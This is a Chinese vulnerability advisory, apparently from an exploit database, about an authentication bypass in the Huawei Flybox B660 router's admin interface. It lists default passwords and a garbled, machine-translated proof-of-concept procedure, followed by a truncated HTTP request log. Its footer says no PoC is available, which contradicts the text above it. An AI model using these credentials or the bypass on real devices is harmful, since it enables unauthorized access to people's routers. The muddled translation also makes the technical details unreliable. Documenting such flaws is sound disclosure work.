Huawei Flybox B660 Router绕过验证漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

## Huawei Flybox B660 Router绕过验证漏洞 Huawei Flybox B660 Router路由器设备存在绕过验证漏洞。由于本地路径"./htmlcode/html/"模块和"indexdefault.asp"文件存在漏洞,未经身份验证的远程攻击者利用漏洞可登录华为Flybox B660路由器的管理后台。 ### Proof of Concept (PoC): ``` 该漏洞可以被利用,即使远程攻击者没有特权的用户帐户或用户交互。为安全示范或复制以下漏洞按照提供的信息和步骤继续。 购买Flybox华为B660之后,该公司设置一个密码你喜欢:“admin”、“12345”或“55555” 我们发现,当你失去了你的密码,您可以执行多次连接通过使用上面的简单密码。 第三个请求连接将被拒绝后一个异常信息,通过拦截请求和传递错误可以绕过身份验证机制的3 g / 4 g路由器设备。问题在Flybox华为B660如下, 没有测试或真或假的密码。如果攻击者尝试很多次错误密码的请求他们重定向你绕过错误后永久改变你的密码。 ``` ``` --- PoC Session Logs [GET] --- GET /htmlcode/html/contentdefault.asp HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, lzma, sdch Accept-Language: en-US,en;q=0.8 Cookie: login_url=settings; CNZZDATA1260483764=1049902387-1478277586-%7C1478277586; Basic=index; Language=en; SessionID_R3=1006428909 Referer: http://localhost/htmlcode/html/content.asp Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1)...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息